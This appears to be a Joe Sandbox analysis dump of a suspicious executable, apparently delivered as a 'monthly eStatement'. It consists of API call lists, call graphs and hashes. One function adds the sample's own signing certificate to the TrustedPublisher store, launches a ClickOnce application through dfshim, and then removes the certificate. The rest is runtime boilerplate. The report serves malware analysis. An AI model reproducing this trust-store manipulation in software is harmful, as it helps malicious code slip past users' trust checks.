6550->6541 6551->6550 6796 9a7570 6797 9a75a9 6796->6797 6798 9a47f9 _free 15 API calls 6797->6798 6802 9a75d5 _ValidateLocalCookies 6797->6802 6799 9a75b2 6798->6799 6800 9a473d _abort 21 API calls 6799->6800 6801 9a75bd _ValidateLocalCookies 6800->6801 6055 9a8df1 6056 9a8e15 6055->6056 6057 9a8e2e 6056->6057 6059 9a9beb __startOneArgErrorHandling 6056->6059 6060 9a8e78 6057->6060 6063 9a99d3 6057->6063 6062 9a9c2d __startOneArgErrorHandling 6059->6062 6071 9aa1c4 6059->6071 6064 9a99f0 DecodePointer 6063->6064 6066 9a9a00 6063->6066 6064->6066 6065 9a9a82 _ValidateLocalCookies 6065->6060 6066->6065 6067 9a9a8d 6066->6067 6068 9a9a37 6066->6068 6067->6065 6069 9a47f9 _free 15 API calls 6067->6069 6068->6065 
6070 9a47f9 _free 15 API calls 6068->6070 6069->6065 6070->6065 6072 9aa1fd __startOneArgErrorHandling 6071->6072 6073 9aa495 __raise_exc RaiseException 6072->6073 6074 9aa224 __startOneArgErrorHandling 6072->6074 6073->6074 6075 9aa267 6074->6075 6076 9aa242 6074->6076 6077 9aa786 __startOneArgErrorHandling 15 API calls 6075->6077 6080 9aa7b5 6076->6080 6079 9aa262 __startOneArgErrorHandling _ValidateLocalCookies 6077->6079 6079->6062 6081 9aa7c4 6080->6081 6082 9aa838 __startOneArgErrorHandling 6081->6082 6083 9aa7e3 __startOneArgErrorHandling 6081->6083 6084 9aa786 __startOneArgErrorHandling 15 API calls 6082->6084 6085 9aa786 __startOneArgErrorHandling 15 API calls 6083->6085 6086 9aa831 6083->6086 6084->6086 6085->6086 6086->6079 6087 9a1ff4 6090 9a2042 6087->6090 6091 9a1fff 6090->6091 6092 9a204b 6090->6092 6092->6091 6093 9a23c3 43 API calls 6092->6093 6094 9a2086 6093->6094 6095 9a23c3 43 API calls 6094->6095 6096 9a2091 6095->6096 6097 9a3e89 33 API calls 6096->6097 6098 9a2099 6097->6098 5924 9a3eb5 5925 9a3eb8 5924->5925 5926 9a3f24 _abort 33 API calls 5925->5926 5927 9a3ec4 5926->5927 6099 9a9beb 6100 9a9c04 __startOneArgErrorHandling 6099->6100 6101 9aa1c4 16 API calls 6100->6101 6102 9a9c2d __startOneArgErrorHandling 6100->6102 6101->6102 6552 9a142e 6555 9a2cf0 6552->6555 6554 9a143f 6556 9a44a8 _free 15 API calls 6555->6556 6557 9a2d07 _ValidateLocalCookies 6556->6557 6557->6554 6558 9a452d 6566 9a5858 6558->6566 6560 9a4537 6561 9a4541 6560->6561 6562 9a44a8 _free 15 API calls 6560->6562 6563 9a4549 6562->6563 6564 9a4556 6563->6564 6571 9a4559 6563->6571 6567 9a5741 _free 5 API calls 6566->6567 6568 9a587f 6567->6568 6569 9a5897 TlsAlloc 6568->6569 6570 9a5888 _ValidateLocalCookies 6568->6570 6569->6570 6570->6560 6572 9a4563 6571->6572 6573 9a4569 6571->6573 6575 9a58ae 6572->6575 6573->6561 6576 9a5741 _free 5 API calls 6575->6576 6577 9a58d5 6576->6577 6578 9a58ed TlsFree 6577->6578 6579 9a58e1 _ValidateLocalCookies 6577->6579 6578->6579 
6579->6573 6803 9a9160 6806 9a917e 6803->6806 6805 9a9176 6807 9a9183 6806->6807 6808 9a99d3 16 API calls 6807->6808 6809 9a9218 6807->6809 6810 9a93af 6808->6810 6809->6805 6810->6805 5928 9a56a1 5929 9a56ac 5928->5929 5931 9a56d5 5929->5931 5932 9a56d1 5929->5932 5934 9a59b3 5929->5934 5939 9a56f9 5931->5939 5935 9a5741 _free 5 API calls 5934->5935 5936 9a59da 5935->5936 5937 9a59f8 InitializeCriticalSectionAndSpinCount 5936->5937 5938 9a59e3 _ValidateLocalCookies 5936->5938 5937->5938 5938->5929 5940 9a5725 5939->5940 5941 9a5706 5939->5941 5940->5932 5942 9a5710 DeleteCriticalSection 5941->5942 5942->5940 5942->5942 6103 9a8ce1 6104 9a8d01 6103->6104 6107 9a8d38 6104->6107 6106 9a8d2b 6109 9a8d3f 6107->6109 6108 9a8da0 6110 9a9997 16 API calls 6108->6110 6111 9a988e 6108->6111 6109->6108 6113 9a8d5f 6109->6113 6112 9a8dee 6110->6112 6111->6106 6112->6106 6113->6111 6114 9a9997 16 API calls 6113->6114 6115 9a98be 6114->6115 6115->6106 5943 9a5ba6 5944 9a5bb1 5943->5944 5946 9a5bd7 5943->5946 5945 9a5bc1 FreeLibrary 5944->5945 5944->5946 5945->5944 6580 9a6026 6581 9a602b 6580->6581 6582 9a604e 6581->6582 6584 9a5c56 6581->6584 6585 9a5c85 6584->6585 6586 9a5c63 6584->6586 6585->6581 6587 9a5c7f 6586->6587 6588 9a5c71 DeleteCriticalSection 6586->6588 6589 9a4869 _free 15 API calls 6587->6589 6588->6587 6588->6588 6589->6585 6116 9a33e5 6117 9a33fd 6116->6117 6118 9a33f7 6116->6118 6120 9a3376 6118->6120 6121 9a33a0 6120->6121 6122 9a3383 6120->6122 6121->6117 6123 9a339a 6122->6123 6124 9a4869 _free 15 API calls 6122->6124 6125 9a4869 _free 15 API calls 6123->6125 6124->6122 6125->6121

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 009A1016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009A1025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009A1032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 009A1057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 009A1063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009A1082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009A10B2
• LocalAlloc.KERNEL32(00000000,?), ref: 009A10C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 009A10F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009A110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009A111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009A112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 009A1134
• LocalFree.KERNEL32(00000000), ref: 009A113E
• LocalFree.KERNEL32(00000000), ref: 009A115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009A116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009A1182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009A1198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009A11A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 009A11BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009A11C6
• Sleep.KERNELBASE(00009C40), ref: 009A11E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 009A120B
• CertCloseStore.CRYPT32(?,00000000), ref: 009A121A
• LocalFree.KERNEL32(?), ref: 009A1223
• LocalFree.KERNEL32(?), ref: 009A1228
• LocalFree.KERNEL32(?), ref: 009A122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: de6a27f127b36e8f6a689e39efa9c684e3a5ab55a2bd0d08c27304c94c7a78cc
• Instruction ID: 4be58e80b965cb0c1b48d492ff302a3de331fdae0322a881d0f5cc0ceab26856
• Opcode Fuzzy Hash: de6a27f127b36e8f6a689e39efa9c684e3a5ab55a2bd0d08c27304c94c7a78cc
• Instruction Fuzzy Hash: 75618C71A54228AFEB219B90DC49FAFBBB8EF4AB50F110014FA14B7291C7719901DBE4

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009A466B
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009A4675
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009A4682
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: kz]G
• API String ID: 3906539128-1940436402
• Opcode ID: b7761ee4ac3aec242c630eaf93f6602c06d88cdbdabc72fd253b241126aefe35
• Instruction ID: 005e373a4e3f1c229e44ec2fe1e1aaf9c215d41be3e01fcae0ba7481674550da
• Opcode Fuzzy Hash: b7761ee4ac3aec242c630eaf93f6602c06d88cdbdabc72fd253b241126aefe35
• Instruction Fuzzy Hash: 7C31D67491122C9BCB21DF64DD8879DBBB8BF49310F5041DAE41CA7261E7709F858F85

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009A192B
• IsDebuggerPresent.KERNEL32 ref: 009A19F7
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A1A10
• UnhandledExceptionFilter.KERNEL32(?), ref: 009A1A1A
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 0db09eb4297cbc77bd692f9a563afad21cf43259592abcdedd9a1d278d5542cf
• Instruction ID: 06fce974de17d7221f5be0bf77e1c426690c15c63955b06d188257224534956f
• Opcode Fuzzy Hash: 0db09eb4297cbc77bd692f9a563afad21cf43259592abcdedd9a1d278d5542cf
• Instruction Fuzzy Hash: C5312875D052289BDF20DFA4D9497CDBBB8AF09300F1041AAE40CAB254EB709A84CF85

Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID:
• String ID: .$kz]G
• API String ID: 0-3939051151
• Opcode ID: 755807c51d76ff2239521368b5c3878f2b360dbc7f6c6359167cfea85f03f96c
• Instruction ID: a736c26d3f78c787846529288bf6624265037eec027ccf791048cc65c991ca50
• Opcode Fuzzy Hash: 755807c51d76ff2239521368b5c3878f2b360dbc7f6c6359167cfea85f03f96c
• Instruction Fuzzy Hash: 5E31D072900249ABCB249E78CC85FEE7BBDEBC6314F1441A8E51997251E6B09D448BA0

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000,?,009A3F66,00000003,009A209F,009A1AFC), ref: 009A3698
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000,?,009A3F66,00000003,009A209F,009A1AFC), ref: 009A369F
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 009A36B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: c20ed2cde65e3bd143c915072d79c916d23284e4f95ef07d3d641eb5bec41e37
                                                                                                                                                                                                                                                    • Instruction ID: 6c451d8aa7985fbf570d9d2f49e76e523b802f9d70dbe27a7058038bf9fa2a41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c20ed2cde65e3bd143c915072d79c916d23284e4f95ef07d3d641eb5bec41e37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53E04671024108AFCF11AF54CD0AB5A3B29FF82341B008014FA058A232DB35DE42DAD0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009AA490,?,?,00000008,?,?,009AA130,00000000), ref: 009AA6C2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: fd83222292119b67a171a0d66f87a27c13b266168e1e94e19e1e5e56ce738306
                                                                                                                                                                                                                                                    • Instruction ID: 7ceb81b99e7a8416d7c8924af04dd5166457f13b30d289777743a85ade25f070
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd83222292119b67a171a0d66f87a27c13b266168e1e94e19e1e5e56ce738306
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB13E31510608DFD715CF28C48AB697BE0FF46364F298658E89ACF2A1C339D991CF81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009A1BEA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                    • Opcode ID: deb025b74409410fa5a843638437d8b93d893843f1f28ec20e9871d0ff3684f7
                                                                                                                                                                                                                                                    • Instruction ID: c7809a95a35f86e25fc3cdff01c9577e3a17c5e8e3f38ba79b8ecaef05d5a6c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: deb025b74409410fa5a843638437d8b93d893843f1f28ec20e9871d0ff3684f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51AEB1E242158FEB18CF65D9917AEBBF8FB49320F14812AC401EB394D3749940CF90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009A1300), ref: 009A1AB1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 534273db4cb9ddfc80f6b0108d7eba292ae9aeb2bdb50cefd2ddb685565a0f7a
                                                                                                                                                                                                                                                    • Instruction ID: bb03f6db80ca37c75cdd02c30710ef7825d2bfefd6d27f2171b26754eb40b12f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 534273db4cb9ddfc80f6b0108d7eba292ae9aeb2bdb50cefd2ddb685565a0f7a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: f7ab550c790545e00fed4581880e5676519b0946be6918a161072b9d248add75
                                                                                                                                                                                                                                                    • Instruction ID: ac4496a54f438b9265d2ca688cb9a4f2742e9d7a0329d5420ae627965a850822
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7ab550c790545e00fed4581880e5676519b0946be6918a161072b9d248add75
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8A0113032C2028B83008F38AB8A2083AA8AA02AA0B020028A008C8020EB208080BA02

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 009A654B
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6095
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60A7
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60B9
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60CB
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60DD
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60EF
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6101
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6113
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6125
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6137
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6149
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A615B
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A616D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6540
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6562
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6577
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6582
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65A4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65B7
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65C5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65D0
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6608
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A660F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A662C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6644
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 161543041-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009A54C8,00000000,?,?,?,009A7D05,?,?,00000100), ref: 009A7B0E
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A7B46
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009A7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009A7B94
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A7C2B
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009A7C8E
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7C9B
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7CA4
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7CC9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 2597970681-1940436402

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4344
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4350
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A435B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4366
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4371
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A437C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4387
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4392
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A439D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A43AB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
